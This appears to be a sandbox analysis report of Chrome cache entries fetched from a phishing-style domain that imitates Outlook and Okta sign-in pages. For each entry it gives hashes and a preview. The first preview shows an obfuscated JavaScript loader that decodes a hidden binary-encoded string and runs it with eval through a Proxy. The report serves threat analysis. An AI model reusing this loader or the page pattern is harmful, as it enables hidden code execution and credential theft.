                                                    URL:https://gt.prjnyvhqq.es/34fDlhbhAZQZgS98w6PXi3wgh9MhxLvtFGDDs89105
                                                    Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................

                                                    Chrome Cache Entry: 77

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):9648
                                                    Entropy (8bit):7.9099172475143416
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4946EB373B18D178C93D473489673BB6
                                                    SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                    SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                    SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/qrkpOyjOiDunHXziFGZrOWjZdbTejVnEICa8M12dnySKzi2ytGQDXno0L7zv5Gw0Rcd240
                                                    Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....

                                                    Chrome Cache Entry: 78

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (51734)
                                                    Category:downloaded
                                                    Size (bytes):222931
                                                    Entropy (8bit):5.0213311632628725
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0329C939FCA7C78756B94FBCD95E322B
                                                    SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                    SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                    SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                    Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh

                                                    Chrome Cache Entry: 79

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10450)
                                                    Category:downloaded
                                                    Size (bytes):10498
                                                    Entropy (8bit):5.327380141461276
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E0D37A504604EF874BAD26435D62011F
                                                    SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                    SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                    SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                    Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo

                                                    Chrome Cache Entry: 80

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):270
                                                    Entropy (8bit):4.840496990713235
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:40EB39126300B56BF66C20EE75B54093
                                                    SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                    SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                    SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/mnKYewUy2Erp7R0vU2rSXaMo7Cq7klTDYuB2MBcvhu2iC2jn90145
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>

                                                    Chrome Cache Entry: 81

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):100
                                                    Entropy (8bit):4.509882725238736
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:297B0CE8D429E36F47C944DB7B16D6FD
                                                    SHA1:669BF0EF2F7C4B9AE00E87128A0EE34AD5F5912E
                                                    SHA-256:0F9D4E88422AE85F100C80E229D87341C1464169E3322BEA9C69B1C3FA1B924C
                                                    SHA-512:E1528AC1850347B26B15CAB9850D2310AFD1067C330A06BD7A228CAABDAC51FAAED9CFE113FC2143670F1FFE76B680E2C82F191C125C43A0700228BF4DEAA367
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhJKCRMnZhnN_36oEgUNzyMq_xIFDcWTxCQSBQ2JpWfLEgUNwxk5kBIFDYmlZ8sSBQ3DGTmQEgUN0AJA7BIFDahd43QhTmpjtPUJcVg=?alt=proto
                                                    Preview:CkgKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=

                                                    Chrome Cache Entry: 82

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):17842
                                                    Entropy (8bit):7.821645806304586
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4B52ECDC33382C9DCA874F551990E704
                                                    SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                    SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                    SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/uvYNdT4TjRgRLErGCQMLf6xakoKmlmnqkwEY7rIwL97aNffM1Fw7tSWolcDFXUWbBYAHef255
                                                    Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD

                                                    Chrome Cache Entry: 84

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65447)
                                                    Category:downloaded
                                                    Size (bytes):89501
                                                    Entropy (8bit):5.289893677458563
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                    Chrome Cache Entry: 88

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):10796
                                                    Entropy (8bit):7.946024875001343
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12BDACC832185D0367ECC23FD24C86CE
                                                    SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                    SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                    SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                    Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.

                                                    Chrome Cache Entry: 89

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):150094
                                                    Entropy (8bit):5.946523644544752
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D1991526EA2EA30B0DD6910FA267B549
                                                    SHA1:8219469D701F4291F464807221EA4C5BC7F5DCE1
                                                    SHA-256:347A25662BB508B67B2033170CD5BD97D8183B274C944830D9592831A610CFDB
                                                    SHA-512:2A98CF35F039684102E22555BBF230FE1D366EAFC4B725A3DEF86A93C6DD84F23B3949E3DA2B68E02F3BBDE8848DD2C7255A3734C0353D9C0A4428CCFD89201A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUY
                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca

                                                    Chrome Cache Entry: 90

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):16
                                                    Entropy (8bit):3.5
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCZvRKkTIEdo7EgUNNzCpMCFHSGLZPIF6Fw==?alt=proto
                                                    Preview:CgkKBw03MKkwGgA=

                                                    Chrome Cache Entry: 91

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):35970
                                                    Entropy (8bit):7.989503040923577
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                    SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                    SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                    SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/GDSherpa-bold.woff
                                                    Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........

                                                    Chrome Cache Entry: 92

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):43596
                                                    Entropy (8bit):7.9952701440723475
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                    SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                    SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                    SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/GDSherpa-vf.woff2
                                                    Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.

                                                    Chrome Cache Entry: 93

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):644
                                                    Entropy (8bit):4.6279651077789685
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:541B83C2195088043337E4353B6FD60D
                                                    SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                    SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                    SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/wxnYfqODAqON352foJK6CCE9kK3PljnLopsxN1ximawy4Kzj8eL12129
                                                    Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...

                                                    Chrome Cache Entry: 94

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):48316
                                                    Entropy (8bit):5.6346993394709
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

                                                    Chrome Cache Entry: 95

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):128
                                                    Entropy (8bit):4.750616928608237
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D90F02F133E7B82AF89B3E58526AC459
                                                    SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                    SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                    SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCQZEyB0JBV3LEgUNX1f-DRIFDRObJGMhISqRgE02F5kSSgkTJ2YZzf9-qBIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IU5qY7T1CXFY?alt=proto
                                                    Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==

                                                    Chrome Cache Entry: 96

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):93276
                                                    Entropy (8bit):7.997636438159837
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                    SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                    SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                    SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/GDSherpa-vf2.woff2
                                                    Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

                                                    Chrome Cache Entry: 98

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                    Category:downloaded
                                                    Size (bytes):28000
                                                    Entropy (8bit):7.99335735457429
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                    SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                    SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
